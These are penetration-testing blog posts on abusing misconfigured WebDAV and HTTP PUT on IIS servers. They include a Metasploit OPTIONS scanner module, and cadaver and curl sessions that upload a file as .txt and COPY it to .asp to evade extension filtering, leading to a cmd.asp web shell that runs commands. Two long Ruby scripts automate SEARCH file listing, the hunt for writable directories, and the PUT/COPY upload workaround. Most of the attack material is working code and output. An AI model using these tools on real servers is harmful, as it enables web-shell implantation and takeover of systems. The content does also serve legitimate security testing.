Showing posts with label http options.

Friday, May 11, 2012

From LOW to PWNED [7] HTTP PUT/WebDAV/SEARCH

Post [7] HTTP PUT/WebDAV/SEARCH

Man, I love misconfigured WebDAV; I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable-directories thing, it's *usually* not writable, but it occurs often enough that you really have to check it every time you see it.

LOW?


IIS5 is awesome (not) because WebDAV is enabled by default, but the web root is not writable. Wait, who still runs Windows 2000?! I know, I know... the app can't be rewritten... accepted risk... blah blah... no one will ever use this to pwn my network... it's OK if that DA admin script logs into it daily...

The "game" is finding the writable directory (if one exists) on the WebDAV-enabled server.
     *Dirbusting and ruby FTW*

I find that it's usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help: Nessus will actually tell you the methods allowed per directory... still a challenge, though.

Once you have a directory you want to test, you can test it manually with cadaver, or use davtest, or Ryan Linn's Metasploit module for testing WebDAV.


I've also done some posts on WebDAV in the past:

http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html

hdm did a post on it in the past in relation to the ASP payload. I can't find it on the R7 site, but it's mirrored here: http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html

Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf

HTTP PUT

HTTP PUT/SEARCH usually gets rolled into



Web scanners are better about alerting on PUT as an available method, and most will attempt the PUT for you. I don't think any vuln scanners do; I'm sure someone will correct me if I'm wrong.

Writable HTTP PUT is rare (at least for me), although some friends say they see it all the time.

Metasploit has a module to test for PUT functionality as well.

HTTP SEARCH

HTTP SEARCH can be fun. When enabled, it will give you a listing of every file under the web root, including files no dirbusting wordlist would ever guess.
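As an added example (not code from the post), here is what that SEARCH request looks like on the wire and how to pull the file list out of the 207 Multi-Status reply IIS sends back. The same parser works on PROPFIND (Depth: 1) replies, which use the same DAV: multistatus format. SAMPLE_REPLY is constructed for this example and the host 192.0.2.10 is a placeholder; the list of "interesting" extensions is my own choice.

```ruby
require 'socket'
require 'rexml/document'

# Added example: build an IIS WebDAV SEARCH request and parse the multistatus
# reply into a file list. Nothing here is the post's own code.
module DavSearch
  # IIS's DASL dialect: a SQL-like query over the scope of the request URI.
  QUERY = <<~XML
    <?xml version="1.0"?>
    <g:searchrequest xmlns:g="DAV:">
      <g:sql>Select "DAV:displayname" from scope()</g:sql>
    </g:searchrequest>
  XML

  # Things worth reading once you know they exist: includes, configs, backups.
  INTERESTING = /\.(inc|asa|config|bak|old|orig|mdb|sql|log|txt)\z/i

  # Raw request with CRLF line endings, ready to pipe into nc like the
  # OPTIONS request elsewhere on this page.
  def self.build_request(host, path = '/')
    ["SEARCH #{path} HTTP/1.1",
     "Host: #{host}",
     'Content-Type: text/xml',
     "Content-Length: #{QUERY.bytesize}",
     'Connection: close',
     '', QUERY].join("\r\n")
  end

  # Every DAV:href in a multistatus body. REXML's Element#name is the local
  # name, so the server's namespace prefix (a:, D:, ...) does not matter.
  def self.hrefs(xml)
    out = []
    REXML::Document.new(xml).root.each_recursive do |e|
      out << e.text.strip if e.name == 'href' && e.text
    end
    out
  end

  # Files only (collections end in '/'), as server-relative paths.
  def self.files(xml)
    hrefs(xml).reject { |h| h.end_with?('/') }
              .map { |h| h.sub(%r{\Ahttps?://[^/]+}, '') }
  end

  def self.interesting(xml)
    files(xml).grep(INTERESTING)
  end

  # Send the request over TCP and return just the response body.
  def self.run(host, path = '/', port: 80)
    s = TCPSocket.new(host, port)
    s.write(build_request(host, path))
    raw = s.read
    s.close
    raw.partition("\r\n\r\n").last
  end
end

# Constructed sample of an IIS reply, trimmed to the hrefs (the real thing
# also carries propstat/status elements, which the parser ignores).
SAMPLE_REPLY = <<~XML
  <?xml version="1.0"?>
  <a:multistatus xmlns:a="DAV:">
    <a:response><a:href>http://192.0.2.10/</a:href></a:response>
    <a:response><a:href>http://192.0.2.10/default.asp</a:href></a:response>
    <a:response><a:href>http://192.0.2.10/include/db.inc</a:href></a:response>
    <a:response><a:href>http://192.0.2.10/web.config.bak</a:href></a:response>
    <a:response><a:href>http://192.0.2.10/_private/</a:href></a:response>
  </a:multistatus>
XML

# Usage: ruby davsearch.rb HOST [/path]   (no traffic without arguments)
if __FILE__ == $0 && ARGV[0]
  body = DavSearch.run(ARGV[0], ARGV[1] || '/')
  puts DavSearch.files(body)
  puts '-- interesting --', DavSearch.interesting(body)
end
```

The query scope is the request URI, so pointing the SEARCH at a subdirectory narrows the listing; a 403 or 501 on SEARCH while OPTIONS still advertises it usually means the method is there but turned off for that path.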




Saturday, October 6, 2007

Metasploit HTTP Options Aux Module

I basically bastardized hdm's version aux module to create an OPTIONS module. I wanted something that would look for web servers that allowed the PUT method.

The code:

##
# options.rb
# bastardized from version module
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Auxiliary::Scanner::Http::Options < Msf::Auxiliary

  # Exploit mixins should be called first
  include Exploit::Remote::HttpClient

  # Scanner mixin should be near last
  include Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'HTTP Options Detection',
      'Version'     => '$Revision: 4886 $',
      'Description' => 'Display the HTTP methods (OPTIONS Allow header) each system advertises',
      'Author'      => 'CG',
      'License'     => MSF_LICENSE
    )
  end

  # Send OPTIONS * to a single host and report its Allow header
  def run_host(ip)

    self.target_port = datastore['RPORT']

    begin
      res = send_request_raw({
        'version' => '1.0',
        'uri'     => '*',
        'method'  => 'OPTIONS'
      }, 10)

      # Only hosts that answer with an Allow header get reported
      if (res and res.headers['Allow'])
        print_status("#{ip} allows #{res.headers['Allow']} methods")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end

end
end

The module in action:

msf auxiliary(options) > run
[*] a.b.c.30 allows OPTIONS, GET, HEAD, POST methods
[*] a.b.c.67 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.104 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.130 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.135 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.141 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.142 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.147 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.149 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.211 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.212 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] a.b.c.246 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

Of course, a server advertising PUT doesn't necessarily allow *you* to PUT anything. Most of the time you'll find that it doesn't: IIS 5 and later don't allow write or modify through the web server by default, so the PUT comes back 403 even though the method is listed.

cg@segfault:~$ cadaver
dav:!> open http://a.b.c.246
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 3981 bytes failed:
403 Forbidden
dav:/> exit

Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module, I wanted to see if I could get one going that would pull down the HTTP verbs a web server allows.

Basically I wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a Metasploit auxiliary module. So I got it going; it's mostly HD's module, but I changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

       =[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

I'll post the code on carnal0wnage when I get off my butt, along with a little something that gives you a status if you are scanning a class C.

**More on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt

Then you have to do a MOVE or COPY request. Personally, I was having issues getting a MOVE request to work over a netcat connection, so I used...

**UPDATE
It ended up being the carriage returns (or lack thereof) that were causing the 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.

cadaver (http://www.webdav.org/cadaver/):

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

From there you will want to upload your cmd.asp so you can execute commands on the box.
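As an added example (not code from either post), the following automates the two chores described on this page: the "find the writable directory" game from the WebDAV post further up, and the PUT-as-.txt-then-COPY trick from the cadaver session just above. For each candidate directory it reads the per-directory OPTIONS Allow header, tries a harmless PUT where PUT is advertised, deletes the marker on success, and when the server refuses a scriptable extension (IIS answered 404 to the .asp PUT above) it uploads the content as .txt and COPYs it to the wanted name. The transport is injectable, a callable that takes a raw request string and returns the raw response, so the logic can be exercised against canned responses; by default it talks TCP to the target. The status-code meanings in the comments are what IIS returns; other DAV servers may differ.

```ruby
require 'socket'

# Added example, not the posts' own code: WebDAV writable-directory prober
# plus the PUT/COPY extension-filter workaround.
class DavProbe
  def initialize(host, port: 80, transport: nil)
    @host = host
    @port = port
    @transport = transport || method(:tcp_send)
  end

  # Assemble a raw HTTP/1.1 request. Lines must end in CRLF: the 400 Bad
  # Request the post hit with netcat came from missing carriage returns.
  def build(meth, uri, headers = {}, body = nil)
    lines = ["#{meth} #{uri} HTTP/1.1", "Host: #{@host}", 'Connection: close']
    headers.each { |k, v| lines << "#{k}: #{v}" }
    lines << "Content-Length: #{body.bytesize}" if body
    lines.join("\r\n") + "\r\n\r\n" + body.to_s
  end

  # Split a raw response into [status, headers]; header names lowercased.
  def parse(raw)
    head, _sep, _body = raw.partition("\r\n\r\n")
    status_line, *hdr_lines = head.split("\r\n")
    status = status_line.split(' ')[1].to_i
    headers = {}
    hdr_lines.each do |l|
      name, _colon, val = l.partition(':')
      headers[name.strip.downcase] = val.strip
    end
    [status, headers]
  end

  def request(meth, uri, headers = {}, body = nil)
    parse(@transport.call(build(meth, uri, headers, body)))
  end

  # Methods advertised for a path. Ask per directory, not just for '*':
  # IIS reports (and enforces) write access per directory.
  def allowed(uri)
    _status, h = request('OPTIONS', uri)
    (h['allow'] || '').split(',').map { |m| m.strip.upcase }
  end

  # Classify a directory by actually trying a PUT, then remove the marker.
  # IIS: 201 Created = writable, 403 = not writable, 404 = extension blocked.
  def probe_dir(dir, marker: 'probe.txt')
    return :no_put unless allowed(dir).include?('PUT')
    path = File.join(dir, marker)
    status, _h = request('PUT', path, { 'Content-Type' => 'text/plain' }, 'dav probe')
    case status
    when 201, 204
      request('DELETE', path)
      :writable
    when 403 then :forbidden
    else :other
    end
  end

  # Directories from a candidate list (dirbusting output, say) that take a PUT.
  def find_writable(dirs)
    dirs.select { |d| probe_dir(d) == :writable }
  end

  # PUT the wanted name directly; if refused, PUT the content as .txt and COPY
  # it over the wanted name. Returns the status of the request that placed
  # (or failed to place) the final file.
  def upload(dir, name, body)
    target = File.join(dir, name)
    status, _h = request('PUT', target, { 'Content-Type' => 'text/plain' }, body)
    return status if status == 201
    tmp = File.join(dir, name.sub(/\.[^.]*\z/, '') + '.txt')
    status, _h = request('PUT', tmp, { 'Content-Type' => 'text/plain' }, body)
    return status unless status == 201
    status, _h = request('COPY', tmp,
                         { 'Destination' => "http://#{@host}:#{@port}#{target}",
                           'Overwrite'   => 'T' })
    request('DELETE', tmp) if [201, 204].include?(status)
    status
  end

  private

  def tcp_send(raw)
    sock = TCPSocket.new(@host, @port)
    sock.write(raw)
    resp = sock.read
    sock.close
    resp
  end
end

# Usage: ruby davprobe.rb HOST /dir1 /dir2 ...   (no traffic without args)
if __FILE__ == $0 && ARGV.length >= 2
  host, *dirs = ARGV
  probe = DavProbe.new(host)
  dirs.each { |d| puts "#{d}: #{probe.probe_dir(d)} (Allow: #{probe.allowed(d).join(' ')})" }
end
```

Feed it the directory list from your dirbusting run; a `:writable` hit on anything other than the web root is exactly the case the WebDAV post says is easy to miss. The marker file and the .txt staging copy are deleted again so the probe leaves nothing behind on a client's box.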


[Screenshot: browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)]

[Screenshot: interacting with our cmdx.aspx to list the directory contents of the C drive]


-CG